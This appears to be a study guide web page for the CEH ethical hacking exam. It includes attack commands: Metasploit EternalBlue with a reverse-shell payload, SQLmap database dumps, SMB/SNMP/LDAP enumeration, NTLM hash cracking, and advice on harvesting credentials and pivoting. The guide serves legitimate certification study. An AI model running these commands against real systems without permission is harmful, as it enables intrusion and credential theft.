How to Pass the CEH (Certified Ethical Hacker) Exam
Master ethical hacking with real CLI tools and proven exam strategies.
The CEH (Certified Ethical Hacker) exam from EC-Council validates your ability to think like a hacker and identify vulnerabilities before malicious actors do. With 125 multiple-choice questions, a 4-hour time limit, and a passing score of 70%, this exam demands both theoretical knowledge and hands-on proficiency. You'll need to master tools like Nmap, Metasploit, Wireshark, and SQLmap, as well as understand footprinting, scanning, enumeration, system hacking, and social engineering. This guide provides a step-by-step study plan, real CLI commands, and insider tips to help you pass on your first attempt.
Understand the Exam Blueprint and Domains
Start by downloading the official CEH exam blueprint from EC-Council. The exam covers 20 domains, including footprinting (17%), scanning networks (17%), enumeration (14%), system hacking (14%), and malware threats (7%). Focus on high-weight domains first. The exam has 125 questions, and you need 70% to pass. Use the blueprint to create a study schedule that allocates more time to domains with higher percentages.
EC-Council CEH Exam Blueprint (v12)
Domain 1: Footprinting & Reconnaissance - 17%
Domain 2: Scanning Networks - 17%
Domain 3: Enumeration - 14%
Domain 4: System Hacking - 14%
Domain 5: Malware Threats - 7%
...
Total Questions: 125
Passing Score: 70%Print the blueprint and check off each domain as you master it. Use a progress tracker to stay motivated.
Don't skip low-weight domains like IoT hacking (3%) — they can still cost you points.
Master Reconnaissance with Nmap and Recon-ng
Footprinting is the first phase of ethical hacking. Practice using Nmap for network scanning and Recon-ng for automated reconnaissance. Learn to identify open ports, running services, and OS fingerprinting. Use Nmap scripts to detect vulnerabilities. For example, run a SYN scan with service version detection and OS detection. Understand the difference between active and passive reconnaissance.
nmap -sS -sV -O -T4 -p- 192.168.1.0/24
# SYN scan, version detection, OS detection, all ports
recon-ng
[recon-ng][default] > use recon/domains-hosts/google_site_web
[recon-ng][default] > set SOURCE example.com
[recon-ng][default] > runUse the Nmap scripting engine (NSE) for vulnerability detection: nmap --script vuln <target>
Always get written permission before scanning any network you don't own.
Perform Enumeration with NetBIOS, SNMP, and LDAP
Enumeration extracts user lists, shares, and services from target systems. Use tools like enum4linux for NetBIOS/SMB enumeration, snmpwalk for SNMP, and ldapsearch for Active Directory. Practice extracting usernames, group memberships, and system policies. This phase is critical for identifying attack vectors.
enum4linux -a 192.168.1.10
# Enumerate users, shares, OS info via SMB
snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.2.1.1
# Enumerate system information via SNMP
ldapsearch -x -H ldap://192.168.1.10 -b "dc=example,dc=com"
# Enumerate LDAP directoryUse the -a flag with enum4linux to get all available information in one go.
SNMP community strings like 'public' are often left default — this is a common exam scenario.
Exploit Vulnerabilities with Metasploit and SQLmap
System hacking involves gaining access. Use Metasploit to exploit known vulnerabilities and SQLmap to automate SQL injection attacks. Practice setting up a listener, selecting an exploit, and configuring payloads. For example, exploit EternalBlue on a Windows target or use SQLmap to dump a database. Understand how to escalate privileges and maintain access.
msfconsole
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 192.168.1.10
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.100
msf6 > exploit
sqlmap -u "http://target.com/page?id=1" --dbs
sqlmap -u "http://target.com/page?id=1" -D database_name --tables
sqlmap -u "http://target.com/page?id=1" -D database_name -T users --dumpUse Metasploit's post-exploitation modules to gather credentials and pivot to other systems.
Metasploit exploits can crash services — test in a lab environment first.
Analyze Traffic with Wireshark and Tcpdump
Packet analysis is essential for detecting attacks and understanding network protocols. Use Wireshark to capture and filter traffic. Practice identifying ARP spoofing, SYN floods, and DNS queries. Use tcpdump for command-line packet capture. Learn to filter by IP, port, and protocol. Understand how to extract files from packet captures.
tcpdump -i eth0 -n -s 0 -w capture.pcap
# Capture all traffic on eth0
tcpdump -r capture.pcap 'tcp port 80'
# Filter HTTP traffic
Wireshark filter: http.request or tcp.port == 443
# Show HTTP requests and HTTPS trafficUse Wireshark's 'Follow TCP Stream' feature to reconstruct conversations and extract data.
Large packet captures can consume memory — use capture filters to limit scope.
Practice Social Engineering and Password Cracking
Social engineering is a key exam domain. Learn techniques like phishing, pretexting, and tailgating. For password cracking, use tools like John the Ripper and Hashcat. Practice cracking NTLM hashes and Linux shadow files. Understand password policies and how to create wordlists with Crunch.
john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
# Crack NTLM hashes
hashcat -m 1000 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
# Hashcat mode 1000 = NTLM
crunch 8 8 abcdef123 -o wordlist.txt
# Generate 8-character wordlist with custom charsetUse the rockyou.txt wordlist — it's included in Kali Linux and contains millions of real passwords.
Password cracking can be time-consuming — focus on weak passwords and common patterns.
Take Practice Exams and Review Weak Areas
After studying all domains, take full-length practice exams from reputable sources like Boson or EC-Council's official practice tests. Simulate the 4-hour time limit. Review every question you got wrong and understand the reasoning. Focus on areas where you score below 80%. Repeat until you consistently score 85% or higher.
Practice Exam Results:
Domain 1: 85%
Domain 2: 78% <- Weak area, review scanning techniques
Domain 3: 90%
Domain 4: 72% <- Weak area, review privilege escalation
Domain 5: 88%
Overall: 82%Use the 'exam mode' in practice tests to build stamina and time management skills.
Don't memorize answers — understand the concepts. EC-Council changes questions frequently.
Key tips
Set up a home lab with VirtualBox or VMware. Install Kali Linux, Metasploitable, and Windows VMs to practice attacks in a safe environment.
Join the CEH subreddit and Discord communities. Discussing concepts with peers reinforces learning and exposes you to real-world scenarios.
Use flashcards for port numbers, tool commands, and attack types. Apps like Anki are great for spaced repetition.
Focus on the 'why' behind each attack. The exam tests your understanding of methodology, not just tool usage.
Take breaks during study sessions. The Pomodoro technique (25 min study, 5 min break) improves retention.
Book your exam date before you start studying. A deadline creates urgency and prevents procrastination.
Frequently asked questions
How many questions are on the CEH exam and what is the passing score?
The CEH exam has 125 multiple-choice questions. You have 4 hours to complete it, and the passing score is 70%. Some questions may be unscored (beta questions), but you won't know which ones. Aim for 85% on practice tests to be safe.
Do I need to take an official EC-Council training course to sit for the exam?
EC-Council requires either official training (through an accredited partner) or at least 2 years of information security experience. If you have the experience, you can apply for the exam without training. Otherwise, you must complete a 5-day official CEH course.
What tools should I be proficient in for the CEH exam?
You should be comfortable with Nmap, Wireshark, Metasploit, SQLmap, John the Ripper, Hashcat, Burp Suite, and Recon-ng. The exam tests both theoretical knowledge and practical usage. Practice each tool in a lab environment until you can use them without referring to documentation.
How long does it take to prepare for the CEH exam?
Most candidates need 2-3 months of consistent study, dedicating 10-15 hours per week. If you have prior networking or security experience, you may need less time. Focus on hands-on labs and practice exams rather than just reading books.
Is the CEH exam worth it for my career?
Yes, especially if you're pursuing a career in penetration testing, security analysis, or red teaming. CEH is recognized by the DoD (8570 directive) and many employers. It demonstrates a structured understanding of ethical hacking methodology. However, consider pairing it with OSCP for advanced roles.
Related glossary terms
Passive reconnaissance
Passive reconnaissance is the process of gathering information about a target system or network without directly interacting with it, using publicly available sources and stealthy observation.
OSINT Techniques
OSINT techniques are methods used to collect information from publicly available sources for security assessments or investigations.
Zero Day Vulnerabilities
A zero day vulnerability is a security flaw in software or hardware that the vendor does not yet know about and has not fixed, making it extremely dangerous because attackers can exploit it before a patch exists.
Steganography
Steganography is the practice of hiding a secret message inside an ordinary, non-secret file such as an image, audio, or video to keep the message hidden from casual observers.
Session Hijacking
Session hijacking is an attack where a cybercriminal steals or takes over a user's active session with a web application, allowing the attacker to pretend to be that user without needing their password.
Exploit Databases
An exploit database is a curated collection of known software vulnerabilities, proof-of-concept exploit code, and security research findings used by ethical hackers and security professionals to test and defend systems.
Practice with real exam questions
Apply what you just learned with exam-style practice questions.